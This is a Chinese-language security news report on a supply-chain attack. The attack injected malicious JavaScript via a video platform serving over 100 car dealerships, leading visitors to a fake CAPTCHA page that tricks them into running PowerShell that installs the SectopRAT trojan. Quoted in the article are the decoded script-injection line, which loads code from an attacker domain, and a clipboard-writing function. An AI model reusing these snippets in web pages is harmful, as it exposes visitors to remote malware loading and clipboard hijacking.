超100家汽车经销商遭供应链攻击，SectopRAT远程访问木马悄然入侵

近期，一起复杂的供应链攻击事件影响了超过100家汽车经销商，导致大量访客暴露于恶意软件感染的风险下。此次攻击利用了一个专门为汽车行业提供服务的视频平台，通过注入恶意代码，将访问者重定向至伪造的网页，这些网页会诱导用户安装危险的SectopRAT远程访问木马。

最初的入侵不是发生在经销商自己的网站上，而是通过汽车行业常用的第三方视频服务。受影响的经销商网站的访问者在不知不觉中接触到恶意JavaScript代码，这些代码可能会将他们重定向到欺骗性页面，促使用户进行互动。

安全研究人员Randy McEoin调查发现，此次攻击的初始渗透点源于汽车行业流媒体服务商"idostream.com"网站被植入的恶意脚本。这是一家总部位于康涅狄格州曼彻斯特市的流媒体服务提供商，主要为汽车经销商提供服务。

被入侵的特定文件被识别为 “les_vide_srp.js”，其中包含旨在加载其他恶意内容的混淆代码。攻击触发后，访问者会看到一个虚假的验证码验证页面，声称用来验证 “我不是机器人”。点击复选框后，用户会被指示执行一些操作，这些操作会使用户不知情的情况下在其计算机上执行恶意代码。

该网页巧妙地操纵了用户的剪贴板，插入了一条恶意 PowerShell 命令。当粘贴到 Windows 运行框中时，这些命令就会被执行。该攻击在社会工程学方面展现了极高的技巧，使受害者相信他们只是在完成一个标准的验证过程，而实际上他们却在安装危险的恶意软件。

攻击从一个混淆的JavaScript脚本开始。经过解码后，研究人员发现该脚本会在网页中插入额外的代码，具体内容如下：

var a = document.createElement('script')a.src = 'https://security-confirmation.help/captchav2'document.getElementsByTagName('head')[0].appendChild(a)

JavaScript 注入代码（来源 – GitHub）

该脚本将用户重定向至托管在“deliveryoka.com”的ClickFix网页。该网页包含一个隐藏的JavaScript函数，专门用于将恶意代码插入用户的剪贴板中：

function setClipboardCopyData(textToCopy) {    const decodedText = textToCopy.replace(/'/g, "'").replace(/"/g, """);    const tempTextArea = document.createElement("textarea");    tempTextArea.value = decodedText;    document.body.append(tempTextArea);    tempTextArea.select();    document.execCommand("copy");    document.body.removeChild(tempTextArea);}

作剪贴板内容的 JavaScript 函数（来源 – GitHub）

执行时，PowerShell命令将下载一个包含SectopRAT恶意软件的压缩文件（Lancaster.zip）。一旦文件被解压并执行，攻击者就能够远程访问受感染的计算机，进一步窃取凭据和敏感数据。

对恶意软件的分析显示，其威胁评分高达10/10，表明其具有极高的危险性。

据报道，第三方服务 LES Automotive 已经对该问题进行了修复，但目前尚不清楚泄露的全部程度和受影响的用户数量。

内容来源：

https://cybersecuritynews.com/100-auto-dealers-hacked-with-a-clickfix-webpage/